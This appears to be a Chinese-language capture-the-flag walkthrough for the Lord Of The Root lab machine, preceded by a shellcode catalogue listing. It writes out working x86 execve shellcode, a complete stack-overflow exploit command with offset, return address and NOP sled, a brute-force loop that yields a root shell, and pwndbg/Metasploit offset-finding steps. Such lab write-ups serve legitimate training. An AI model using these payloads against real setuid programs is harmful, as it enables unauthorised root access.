--More--(50/170)
[815] Linux/x86-64 - setreuid(0,0) execve(/bin/ash,NULL,NULL) + XOR - 85 bytes
[816] Linux/x86-64 - setreuid(0,0) execve(/bin/csh, [/bin/csh, NULL]) + XOR - 87 bytes
[817] Linux/x86-64 - setreuid(0,0) execve(/bin/ksh, [/bin/ksh, NULL]) + XOR - 87 bytes
[818] Linux/x86-64 - setreuid(0,0) execve(/bin/zsh, [/bin/zsh, NULL]) + XOR - 87 bytes
[77] Linux/x86-64 - setuid(0) + execve(/bin/sh) 49 bytes
[76] Linux/x86-64 - execve(/bin/sh, [/bin/sh], NULL) - 33 bytes
[603] Linux/x86-64 - execve(/bin/sh); - 30 bytes
[902] Linux/x86 - Followtheleader custom execve-shellcode Encoder/Decoder - 136 bytes
[900] Linux/x86 - ROT-7 Decoder execve - 74 bytes
[887] Linux/x86 - Obfuscated - chmod({passwd,shadow}) - add new root user - exec /bin/sh - 512 bytes
[886] Linux/x86 - setreuid() + exec /usr/bin/python - 54 bytes
[885] Linux/x86 - chmod + Add new root user with password + exec sh - 378 bytes
[881] Linux/x86 - sockfd trick + dup2(0,0),dup2(0,1),dup2(0,2) + execve /bin/sh - 50 bytes
[869] Linux/x86 - JMP-FSTENV execve shell - 67 bytes
[868] Linux/x86 - shift-bit-encoder execve - 114 bytes
[863] Linux/x86 - jump-call-pop execve shell - 52 bytes
[862] Linux/x86 - Download + chmod + exec - 108 bytes
[851] Linux/x86 - Obfuscated execve /bin/sh - 30 bytes
[846] Linux/x86 - Encrypted execve /bin/sh with uzumaki algorithm - 50 bytes
[845] Linux/x86 - Mutated Execve Wget - 96 bytes
[841] Linux/x86 - Tiny Execve sh Shellcode - 21 bytes
[204] Linux/x86 - execve read shellcode - 92 bytes
[237] Linux/x86 - execve() Diassembly Obfuscation Shellcode - 32 bytes
[547] Linux/x86 - execve()/bin/ash; exit; - 34 bytes
[549] Linux/x86 - setuid(); execve(); exit(); - 44 bytes
--More--(75/170)
[216] Linux/x86 - setreuid(0, 0) + execve(/bin//sh, [/bin//sh, -c, cmd], NULL);
[756] Linux/x86 - execve(/bin/dash) - 49 bytes
[541] Linux/x86 - Audio (knock knock knock) via /dev/dsp+setreuid(0,0)+execve() - 566 bytes
[250] Linux/x86 - setreuid(0,0) + execve(/bin/sh, [/bin/sh, NULL]) - 33 bytes
[251] Linux/x86 - setuid(0) setgid(0) execve("/bin/sh", ["/bin/sh", NULL]) - 37 bytes
[827] Linux/x86 - execve /bin/sh shellcode - 23 bytes
[828] Linux/x86 - execve-chmod 0777 /etc/shadow - 57 bytes
[811] Linux/x86 - execve(/bin/sh) - 28 bytes
[606] Linux/x86 - execve(/bin/bash, [/bin/sh, -p], NULL) - 33 bytes
[607] Linux/x86 - polymorphic execve(/bin/bash, [/bin/sh, -p], NULL) - 57 bytes
[57] Linux/x86 - execve(rm -rf /) - 45 bytes
[222] Linux/x86 - setuid(0) setgid(0) execve(echo 0 > /proc/sys/kernel/randomize_va_space) - 79 bytes
[585] Linux/x86 - execve(/bin/sh) - 25 bytes
[589] Linux/x86 - execve(a->/bin/sh) - 14 bytes
[597] Linux/x86 - setreud(getuid(), getuid()) & execve(/bin/sh) - 34 bytes
[599] Linux/x86 - setuid(0) ^ execve(/bin/sh, 0, 0) - 27 bytes
[598] Linux/x86 - setuid(0) + execve(/bin/sh,...) - 29 bytes
[219] Linux/x86 - stdin re-open and /bin/sh execute
[358] Linux/x86 - execve /bin/sh encrypted - 58 bytes
[256] Linux/x86 - execve /bin/sh anti-ids 40 bytes
[58] Linux/x86 - execve(/bin//sh/,[/bin//sh],NULL) - 22 bytes
[215] Linux/x86 - setuid(0) + execve(/bin//sh, [/bin//sh], NULL) - 28 bytes
[483] Linux/x86 - execve(/sbin/halt,/sbin/halt) - 27 bytes
[477] Linux/x86 - execve(/sbin/reboot,/sbin/reboot) - 28 bytes
[476] Linux/x86 - execve(/sbin/shutdown,/sbin/shutdown 0) - 36 bytes
--More--(100/170)
[472] Linux/x86 - setuid(0) & execve(/bin/sh,0) - 25 bytes
[473] Linux/x86 - setuid(0), setgid(0) & execve(/bin/sh,[/bin/sh,NULL]) - 33 bytes
[758] Linux/x86 - execve(/bin/cat, /etc/shadow, NULL) - 42 bytes
[399] Linux/x86 - setreuid(geteuid(),geteuid()),execve(/bin/sh,0,0) - 34bytes
[54] Linux/x86 - upload & exec - 189 bytes
[74] Linux/x86 - Perl script execution 99 bytes + script length
[810] Linux/x86 - setreuid(0,0) execve("/bin/zsh", [/bin/zsh, NULL]) + XOR - 53 bytes
[808] Linux/x86 - setreuid(0,0) execve("/bin/csh", [/bin/csh, NULL]) + XOR - 53 bytes
[809] Linux/x86 - setreuid(0,0) execve("/bin/ksh", [/bin/ksh, NULL]) + XOR - 53 bytes
[807] Linux/x86 - setreuid(0,0) execve(/bin/ash,NULL,NULL) + XOR - 58 bytes
[555] Linux/x86 - execve() - 51bytes
[643] Linux/x86 - give all user root access when execute /bin/sh - 45 bytes
[632] Linux/x86 - sys_execve(/bin/sh, -c, ping localhost) - 55 bytes
[631] Linux/x86 - sys_setuid(0) & sys_setgid(0) & execve (/bin/sh) - 39 bytes
[575] Linux/x86 - execve /bin/sh - 21 bytes
[59] Linux/x86 - HTTP/1.x GET, Downloads & execve() - 111 bytes+
[230] Linux/x86 - anti-debug trick (INT 3h trap) execve(/bin/sh, [/bin/sh, NULL], NULL) - 39 bytes
[228] Linux/x86 - execve /bin/sh xored for Intel x86 CPUID 41 bytes
[226] Linux/x86 - execve(/bin/sh, [/bin/sh, NULL]) + Bitmap - 27 bytes
[225] Linux/x86 - execve(/bin/sh, [/bin/sh, NULL]) + RIFF Header - 28 bytes
[224] Linux/x86 - execve(/bin/sh, [/bin/sh, NULL]) + RTF header - 30 bytes
[223] Linux/x86 - execve(/bin/sh, [/bin/sh, NULL]) + ZIP Header - 28 bytes
[229] Linux/x86 - execve(/bin/sh, [/bin/sh], NULL) / encoded by +1 - 39 bytes
[557] Linux/x86 - setuid(0) & execve(/bin/cat /etc/shadow) - 49 bytes
[558] Linux/x86 - setuid(0) & execve(/sbin/poweroff -f) - 47 bytes
--More--(125/170)
[752] Linux/x86 - execve (/bin/sh) - 21 Bytes
[206] Linux/x86 - connect back, download a file and execute - 149 bytes
[261] Linux/x86 - setreuid & execve - 31 bytes
[363] Linux/x86 - break chroot execve /bin/sh - 80 bytes
[517] Linux/x86 - execve(/bin/sh,0,0) - 21 bytes
[516] Linux/x86 - setuid(0) & execve(/bin/sh,0,0) - 28 bytes
[551] Linux/x86 - setresuid(0,0,0); execve /bin/sh; exit; - 41 bytes
[61] Linux/x86 - setuid(0) & execve(/bin/sh,0,0) - 28 bytes
[369] Linux/x86 - shared memory exec - 50 bytes
[466] Linux/x86 - setuid() & execve() - 27 bytes
[249] Linux/x86 - Magic Byte Self Modifying Code for surviving - execve() _exit() - 76 bytes
[248] Linux/x86 - Radically Self Modifying Code - execve & _exit() - 70 bytes
[546] Linux/x86 - execve of /bin/sh /tmp/p00p - 70 bytes
[544] Linux/x86 - execve of /sbin/ipchains -F - 70 bytes
[545] Linux/x86 - execve() of /sbin/iptables -F - 70 bytes
[108] NetBSD/x86 - execve(/bin/sh) - 68 bytes
[109] NetBSD/x86 - setreuid(0, 0); execve(/bin//sh, ..., NULL); - 29 bytes
[163] OpenBSD/x86 - execve(/bin/sh) - 23 bytes
[120] Osx/ppc - shellcode execve(/bin/sh)
[129] Osx/ppc - execve(/bin/sh,[/bin/sh],NULL)& exit() - 72 bytes
[692] Osx/x86 - execve(/bin/sh) - 24 bytes
[240] Solaris/mips - download and execute - 278 bytes
[385] Solaris/sparc - setreuid(geteuid()), setregid(getegid()), execve /bin/sh
[116] Solaris/sparc - execve(/bin/sh) - 52 bytes
[613] Solaris/x86 - execve(/bin/sh, /bin/sh, NULL) - 27 bytes
--More--(150/170)
[114] Solaris/x86 - add services and execve inetd - 201 bytes
[113] Solaris/x86 - execve /bin/sh toupper evasion - 84 bytes
[386] Solaris/x86 - execve /bin/sh - 43 bytes
[112] Solaris/x86 - setuid(0)&execve(//bin/sh)&exit(0) - 39 bytes
[111] Solaris/x86 - setuid(0)&execve(/bin/cat, /etc/shadow)&exit(0) - 59 bytes
[899] Windows/64 - Obfuscated Shellcode x86/x64 Download And Execute [Use PowerShell] - Generator
[150] Windows/64 - (URLDownloadToFileA) download and execute - 218+ bytes
[673] Windows - Safari JS JITed shellcode - exec calc (ASLR/DEP bypass)
[767] Windows - Vista/7/2008 - download and execute file via reverse DNS channel
[148] Windows - telnetbind by winexec - 111 bytes
[581] Windows - XP sp3 (Ru) WinExec+ExitProcess cmd shellcode - 12 bytes
[146] Windows - XP download and exec source
[766] Windows - Allwin WinExec add new local administrator + ExitProcess Shellcode - 272 bytes
[662] Windows - Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
[701] Windows - null-free 32-bit Windows shellcode that executes calc.exe - 100 bytes
[391] Windows - WinExec() Command Parameter - 104 bytes
[392] Windows - download and execute - 124 bytes
[159] Windows - Download and Execute Shellcode Generator
[162] Windows - download & exec shellcode - 226 bytes+
[157] Windows - connectback, receive, save and execute shellcode


缓冲区溢出

kali下gdb安装peda_pwndbg_gef走过的坑 - 知乎.pdf

这里有坑,gdb 这个是插件流,只能单个插件的使用和下载,在配置文件修改,就是你调试和生成 shellcode 不能同时使用,使用的时候需要注释,默认是没有文件

echo "source ~/peda/peda.py" >> ~/.gdbinit
└─# cat ~/.gdbinit             

source /root/peda/peda.py

这里我就调用 shellcode,这里是本地提权,所以 payload 是一样的

gdb-peda$ shellcode generate x86/linux exec
# x86/linux/exec: 24 bytes
shellcode = (
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
"\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
)

检查一下有无开其他的安全措施

gdb-peda$ checksec 
Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated.
Use 'set logging enabled off'.

Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated.
Use 'set logging enabled on'.

CANARY : disabled
FORTIFY : disabled
NX : disabled
PIE : disabled
RELRO : disabled

然后上面的 ESP 是 0xffffc860,这里要大端小端的写法,进行倒序,这里生成完 shellcode,需要注释掉,回到调试界面,我这里的是 Python2 进行输出,根据情况变化

run $(python2 -c 'print "A" * 171 + "\x60\xc8\xff\xff" + "\x90" * 20000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')

这里我是在本地缓冲区成功的

└─# gdb -q file
Reading symbols from file...
(No debugging symbols found in file)
(gdb) run $(python2 -c 'print "A" * 171 + "\x60\xc8\xff\xff" + "\x90" * 20000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')
Starting program: /root/桌面/demo/Lord_Of_The_Root-1.0.1/file $(python2 -c 'print "A" * 171 + "\x60\xc8\xff\xff" + "\x90" * 20000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
process 13681 is executing new program: /usr/bin/dash
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
#

回到靶机的界面,这里需要重新判断 buf 的文件在哪里

for a in {1..1000}; do ./file $(python -c 'print "A" * 171 + "\xa0\x64\x8b\xbf" + "\x90" * 20000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"'); done

这里等待一下,就能拿到权限

[email protected]:/SECRET$ ls -alhR
.:
total 20K
drwxr-xr-x 5 root root 4.0K Sep 22 2015 .
drwxr-xr-x 23 root root 4.0K Sep 22 2015 ..
drwxr-xr-x 2 root root 4.0K Nov 13 22:42 door1
drwxr-xr-x 2 root root 4.0K Nov 13 22:42 door2
drwxr-xr-x 2 root root 4.0K Nov 13 22:42 door3

./door1:
total 16K
drwxr-xr-x 2 root root 4.0K Nov 13 22:42 .
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ..
-rwsr-xr-x 1 root root 7.2K Sep 17 2015 file

./door2:
total 16K
drwxr-xr-x 2 root root 4.0K Nov 13 22:42 .
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ..
-rwsr-xr-x 1 root root 5.1K Sep 22 2015 file

./door3:
total 16K
drwxr-xr-x 2 root root 4.0K Nov 13 22:42 .
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ..
-rwsr-xr-x 1 root root 7.2K Sep 17 2015 file
[email protected]:/SECRET$ cd door2/
[email protected]:/SECRET/door2$ ls
file
[email protected]:/SECRET/door2$ for a in {1..1000}; do ./file $(python -c 'print "A" * 171 + "\xa0\x64\x8b\xbf" + "\x90" * 20000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"'); done
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
# id
uid=1000(smeagol) gid=1000(smeagol) euid=0(root) groups=0(root),1000(smeagol)
#


缓冲区-2

另外的一种调试方法,思路类似

sudo pip3 install pwntools -i https://mirrors.aliyun.com/pypi/simple/
apt install --fix-missing python3-pip
apt install gdb

# gdb 的安装
git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh

vim ~/.gdbinit
source /xx/pwndbg/pwndbg-dev/pwndbg-dev/gdbinit.py(具体路径)
source ~/.gdbinit

文件分析

这里的话,还是需要养成一个信息收集的好习惯,字符串的提取

string file

这里假设不知道这个是缓冲区文件的话,我们就需要进行解剖文件分析,是否存在特定的函数

objdump -d --no-show-raw-insn file


溢出点

这里检测一下溢出点,可以看到到0x41376641就报错

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000

pwndbg> run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
Starting program: /root/demo/file Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x41376641 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────
EAX 0x0
*EBX 0xf7fa0ff4 (_GLOBAL_OFFSET_TABLE_) ◂— 0x220d8c
*ECX 0xffffd3f0 ◂— 'Bh1Bh2B'
*EDX 0xffffd0b2 ◂— 'Bh1Bh2B'
*EDI 0xf7ffcb80 (_rtld_global_ro) ◂— 0x0
*ESI 0xffffce34 ◂— 0x6c41386c ('l8Al')
*EBP 0x36664135 ('5Af6')
*ESP 0xffffcd80 ◂— 0x66413866 ('f8Af')
*EIP 0x41376641 ('Af7A')
─────────────────────────────────────────────────────[ DISASM / i386 / set emulate on ]─────────────────────────────────────────────────────
Invalid address 0x41376641

上面检测溢出点,这里就需要定位溢出点

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x41376641

└─# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x41376641
[*] Exact match at offset 171

权限

如果当前的 EIP 可控制以后,我们下一步就需要查看,是否写入权限vmmap

  • STACK:栈,用来保存函数运行时的临时变量等

  • HEAP:堆,一般是主动编写代码来分配和回收堆内存

  • CODE: 代码段,是用来存放代码的

  • DATA:数据段,一般用来存放全局变量

pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
Start End Perm Size Offset File
0x8048000 0x8049000 r-xp 1000 0 /root/demo/file
0x8049000 0x804a000 rw-p 1000 0 /root/demo/file
0xf7d80000 0xf7da0000 r--p 20000 0 /usr/lib/i386-linux-gnu/libc.so.6
0xf7da0000 0xf7f19000 r-xp 179000 20000 /usr/lib/i386-linux-gnu/libc.so.6
0xf7f19000 0xf7f9f000 r--p 86000 199000 /usr/lib/i386-linux-gnu/libc.so.6
0xf7f9f000 0xf7fa1000 r--p 2000 21e000 /usr/lib/i386-linux-gnu/libc.so.6
0xf7fa1000 0xf7fa2000 rw-p 1000 220000 /usr/lib/i386-linux-gnu/libc.so.6
0xf7fa2000 0xf7fac000 rw-p a000 0 [anon_f7fa2]
0xf7fbf000 0xf7fc1000 rw-p 2000 0 [anon_f7fbf]
